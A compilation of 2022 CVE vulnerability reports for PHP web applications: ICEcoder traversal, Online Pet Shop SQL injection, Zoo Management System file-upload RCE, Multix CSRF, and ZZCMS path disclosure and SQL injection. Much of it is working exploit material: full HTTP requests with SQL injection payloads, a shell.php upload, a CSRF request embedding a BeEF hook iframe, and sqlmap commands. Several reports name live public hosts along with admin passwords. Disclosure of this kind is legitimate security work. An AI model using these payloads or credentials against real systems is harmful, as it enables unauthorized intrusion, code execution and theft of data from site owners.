ICEcoder v8.1 allows attackers to execute a directory traversal.

//line 62
if (true === isset($\_POST\['username'\]) && "" !== $\_POST\['username'\]) {$username = $\_POST\['username'\] . "\-";};
$settingsFile = 'config-' . $username . str\_replace(".", "\_", str\_replace("www.", "", $\_SERVER\['SERVER\_NAME'\])) . '.php';
// line 110
$ICEcoderUserSettings = $settingsClass\->getConfigUsersSettings($settingsFile);

//line 160
// Note: the source is in the $filename
public function getConfigUsersSettings($fileName)
    {
        // Get users config file details
        $fullPath = $this\->getConfigUsersFileDetails($fileName)\['fullPath'\]; // $fullPath is a source
        $settingsFromFile = $this\->serializedFileData("get", $fullPath); // attacker control the loaded file in this function
        // Now return
        return $settingsFromFile;
    }

//line 142
// Note: the source is in the $filename
public function getConfigUsersFileDetails($fileName)
    {
        // Return details about the users config file
        $fullPath = dirname(\_\_FILE\_\_) . "/../data/" . $fileName;
        $exists = file\_exists($fullPath);
        $readable = is\_readable($fullPath);
        $writable = is\_writable($fullPath);
        $filemtime = filemtime($fullPath);
        return \[
            "fileName" => $fileName,
            "fullPath" => $fullPath,
            "exists" => $exists,
            "readable" => $readable,
            "writable" => $writable,
            "filemtime" => $filemtime,
        \];
    }

// line 226
public function serializedFileData($do, $fullPath, $output\=null)
    {
        if ("get" === $do) {
            if (function\_exists('opcache\_invalidate')) {
                opcache\_invalidate($fullPath, true);
            }
            $data = file\_get\_contents($fullPath); // Note: $fullPath is controlled by the user
            $data = str\_replace("<"."?php\\n/\*\\n\\n", "", $data);
            $data = str\_replace("\\n\\n\*/\\n?"."\>", "", $data);
            $data = unserialize($data);
            return $data;
        }
        if ("set" === $do) {
            if (true === is\_array($output)) {
                $output = serialize($output);
            }
            return false !== file\_put\_contents($fullPath, "<"."?php\\n/\*\\n\\n" . $output . "\\n\\n\*/\\n?" . "\>");
        }
    }

CVE-2022-34026 is assigned to this report.

CVE-2022-34026: directory traversal in ICEcoder

Online Pet Shop We App v1.0 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_sub_category,id

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_sub\_category,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_sub\_category,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_sub\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40934: Bug_report/SQLi-3.md at main · lime-10010/Bug_report

Online Pet Shop We App v1.0 is vulnerable to SQL Injection via /pet_shop/classes/Master.php?f=delete_category,id.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_category,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_category,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40935: Bug_report/SQLi-2.md at main · lime-10010/Bug_report

Online Pet Shop We App v1.0 by oretnom23 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_order,id.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_order,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_order,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_order HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40933: Bug_report/SQLi-1.md at main · lime-10010/Bug_report

In Zoo Management System v1.0, there is an arbitrary file upload vulnerability in the picture upload point of the "gallery" file of the "Gallery" module in the background management system.

Permalink

Cannot retrieve contributors at this time

**Zoo Management System v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Lime

Admind login account: admin@mail.com/Password@123

vendor: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html

Vulnerability url: http://ip/ZooManagementSystem/admin/public\_html/gallery

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the "gallery" file of the "Gallery" module in the background management system

Request package for file upload：

POST /ZooManagementSystem/admin/public\_html/gallery HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/ZooManagementSystem/admin/public\_html/gallery
Cookie: PHPSESSID=5d10vq7lgptbau7foskstiug7i
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------29223726215286
Content-Length: 330
\-----------------------------29223726215286
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------29223726215286
Content-Disposition: form-data; name="submit\_image"
\-----------------------------29223726215286--

The files will be uploaded to this directory \\ZooManagementSystem\\img\\gallery\\image 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-40932: Bug_report/RCE-1.md at main · lime-10010/Bug_report

Multix version 2.4 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /admin/file/add HTTP/1.1Host: localhostContent-Length: 466Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5VeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/admin/file/addAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1;Connection: close------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_title"<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"Content-Type: imageasdasd------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="form1"------WebKitFormBoundaryE0mBtYGic6umB5Ve--

Multix 2.4 Cross Site Request Forgery

An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request sent to /one/siteinfo.php.

**Attack vector(s):**  
zzcms is a set of content management system (CMS) of China's zzcms team.  
Absolute path information disclosure vulnerability exists in zzcms 2022. An unauthenticated attacker can take advantage of this vulnerability by sending a get request to "/one/siteinfo.php" (the get request is changed to "//one/siteinfo.php") to obtain the error information returned by the server showing the location (absolute path) of the application.

**Product:**  
ZZCMS

**Version:**  
ZZCMS 2022

**Vendor Homepage:**  
http://www.zzcms.net/

**Software Link:**  
http://www.zzcms.net/download/zzcms2022.zip

or  
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip

**POC:**  
get request to "/one/siteinfo.php" changed to "//one/siteinfo.php", to obtain the error information returned by the server showing the location (absolute path) of the application.

**Affected pages:**  
All pages that contain page /one/siteinfo.php

**For Example :**  
**You need to use an IP address in China to access**  
Case 1:  
Get request http://demo.zzcms.net//one/siteinfo.php  
Get the error information returned by the server showing the location (absolute path) of the application "Warning: strpos(): Empty needle in /www/users/HA165388/WEB/inc/top2.php on line 45"  

Case 2:  
Get request http://9.zzcms.net//one/siteinfo.php  
Get the error information returned by the server showing the location (absolute path) of the application " Warning: strpos(): Empty needle in D:\\jiu\\inc\\top2.php on line 45"  

Case 3:  
Get request http://hzp.zzcms.net//one/siteinfo.php  
Get the error information returned by the server showing the location (absolute path) of the application " Warning: strpos(): Empty needle in D:\\hzp\\inc\\top2.php on line 45"  

Case 4:  
Get request http://3158.zzcms.net//one/siteinfo.php  
Get the error information returned by the server showing the location (absolute path) of the application " Warning: strpos(): Empty needle in D:\\zzcms\_xm\\inc\\top2.php on line 45"

CVE-2022-40443: ZZCMS absolute path information disclosure vulnerability · Issue #1 · liong007/ZZCMS

ZZCMS 2022 was discovered to contain a full path disclosure vulnerability via the page /admin/index.PHP? _server.

**Attack vector(s):**  
zzcms is a set of content management system (CMS) of China's zzcms team.  
The zzcms 2022 version has a vulnerability that the zzcms management landing page leaks absolute path information. An unauthenticated attacker can obtain the error information showing the location (absolute path) of the application returned by the server by visiting "/admin/index.PHP? \_server" on the zzcms management login page.

**Product:**  
ZZCMS

**Version:**  
ZZCMS 2022

**Vendor Homepage:**  
http://www.zzcms.net/

**Software Link:**  
http://www.zzcms.net/download/zzcms2022.zip

or  
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip

**POC:**  
Request "/admin/index php?\_ Server", Response error information returned by the server showing the location (absolute path) of the application.

**Affected pages:**  
All pages that contain page /admin/index php?\_ Server

**For Example :**  
**You need to use an IP address in China to access**  
Case 1:  
request http://demo.zzcms.net/admin/index.php?\_SERVER  

The response contains: **Warning**: Illegal string offset 'REQUEST\_URI' in **/www/users/HA165388/WEB/inc/global.php**  

Case 2:  
request http://3158.zzcms.net/admin/index.php?\_SERVER  

The response contains: **Warning**: Illegal string offset 'REQUEST\_URI' in **D:\\zzcms\_xm\\inc\\global.php**  

Case 3:  
request http://9.zzcms.net/admin/index.php?\_SERVER  

The response contains: **Warning**: Illegal string offset 'REQUEST\_URI' in **D:\\jiu\\inc\\global.php**  

Case 4:  
request http://hzp.zzcms.net/admin/index.php?\_SERVER  

The response contains: **Warning**: Illegal string offset 'REQUEST\_URI' in **D:\\hzp\\inc\\global.php**

CVE-2022-40444: ZZCMS management landing page Path Disclosure · Issue #2 · liong007/ZZCMS

ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the keyword parameter at /admin/baojia_list.php.

\*\*Exploit Title：\*\*ZZCMS2022 is vulnerable to SQL injection  
**Google Dork:** ZZCMS  
\*\*Date：\*\*9/11/2022  
\*\*Exploit Author：\*\*Yuan Lirong  
**Vendor Homepage:** http://www.zzcms.net/about/6.html  
**Software Link:**  
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip  
http://www.zzcms.net/download/zzcms2022.zip  
**Version:** ZZCMS 2022  
Tested on:Windows Server 2008,Ubuntu  
**Attack vector(s):**  
zzcms is a set of content management system (CMS) of China's zzcms team.  
ZZCMS2022 is vulnerable to SQL injection via baojia\_list.php.  
After the administrator logged in,than to SQL injection via the parameter “keyword” of "/admin/baojia\_list.php ".

**POC：**  
You need to use an IP address in China to access.  
**Case 1:**  
Login http://119.28.176.129/admin  
User: admin Password: 123456  

1.  Click "报价","查找" input 1’，Return error "Warning: mysqli\_fetch\_array() expects parameter 1 to be mysqli\_result, boolean given in /www/wwwroot/zzcms2022/inc/conn.php on line 54"  
    

Check the source code of "/admin/baojia\_list.php". The condition variables in the SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities.  

2）SQL injection on parameter "keyword" of "baojia\_list. PHP"  
POST /admin/baojia\_list.php? HTTP/1.1  
Host: 119.28.176.129  
keyword=1'&Submit=%E6%9F%A5%E6%89%BE  

EXP:  
keyword=1' AND (SELECT 3526 FROM (SELECT(SLEEP(5)))qvLz)-- Iojq&Submit=%E6%9F%A5%E6%89%BE  

3）Scanning request packages with sqlmap  
sqlmap.py -r sql.txt --level 3 risk 3 --current-db  
The contents of sql.txt are as follows:  

The sqlmap scan results are as follows:  
  

**Case 2:**  
Login http://175.6.210.20:81/admin  
User: admin Password: 123456789qwe  

1.  Click "报价","查找" input 1’，Return error "Warning: mysqli\_fetch\_array() expects parameter 1 to be mysqli\_result, boolean given in C:\\wwwroot\\zzcms2022\\inc\\conn.php on line 54"  
    

2）SQL injection on parameter "keyword" of "baojia\_list. PHP"  
POST /admin/baojia\_list.php? HTTP/1.1  
Host: 175.6.210.20:81  
keyword=1'&Submit=%E6%9F%A5%E6%89%BE  

EXP:  
keyword=1' AND (SELECT 3526 FROM (SELECT(SLEEP(5)))qvLz)-- Iojq&Submit=%E6%9F%A5%E6%89%BE  

3）Scanning request packages with sqlmap  
sqlmap.py -r sql2021.txt --level 3 risk 3 --current-db  
The contents of sql2021.txt are as follows:  

The sqlmap scan results are as follows:

CVE-2022-40447: ZZCMS2022 is vulnerable to SQL injection in "baojia_list.php" · Issue #5 · liong007/ZZCMS

ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the component /admin/sendmailto.php?tomail=&groupid=.

\*\*Exploit Title：\*\*ZZCMS2022 is vulnerable to SQL injection  
**Google Dork:** ZZCMS  
**Software Link:**  
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip  
http://www.zzcms.net/download/zzcms2022.zip  
**Version:** ZZCMS 2022  
\*\*Tested on:\*\*Windows Server 2008,Ubuntu  
**Attack vector(s):**  
zzcms is a set of content management system (CMS) of China's zzcms team.  
ZZCMS2022 is vulnerable to SQL injection via /admin/sendmailto.php?tomail=&groupid=.  
**Vendor Homepage:** http://www.zzcms.net/about/6.html  
  
Just after deployment, the version is "powered by zzcms2021"  
  
After deployment, it will be automatically upgraded to powered by zzcms2022 the next day  

**Affected pages:**  
All pages that contain page “/admin/sendmailto.php?tomail=&groupid=”

**For Example :**  
You need to use an IP address in China to access.  
**Case 1:**  
Login http://119.28.176.129/admin  
User: admin  
Password: 123456  
  
**1) click “发E-mail”, click “发送”， Return error “select email from zzcms\_user where groupid=1 order by id asc limit 0,2完成”**  
  

Condition variables in SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities  

**2) Capturing packets and viewing SQL injection points**  
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1  
Host: 119.28.176.129  

**3) Scan with sqlmap**  
sqlmap.py -r sql2022.txt  
The contents of sql2022.txt are as follows:  
  
Sqlmap scan results:  

**Case 2:**  
Login http://175.6.210.20:81/admin  
User: admin  
Password: 123456789qwe  

1.  click “发E-mail”, click “发送”， Return error “select email from zzcms\_user where groupid=1 order by id asc limit 0,2”  
      
    

Condition variables in SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities  

2.  Capturing packets and viewing SQL injection points  
    GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1  
    Host: 175.6.210.20:81  
    
3.  Scan with sqlmap  
    sqlmap.py -r sql2022-2.txt  
    The contents of sql2022-2.txt are as follows:  
    

Sqlmap scan results:

Tag

#php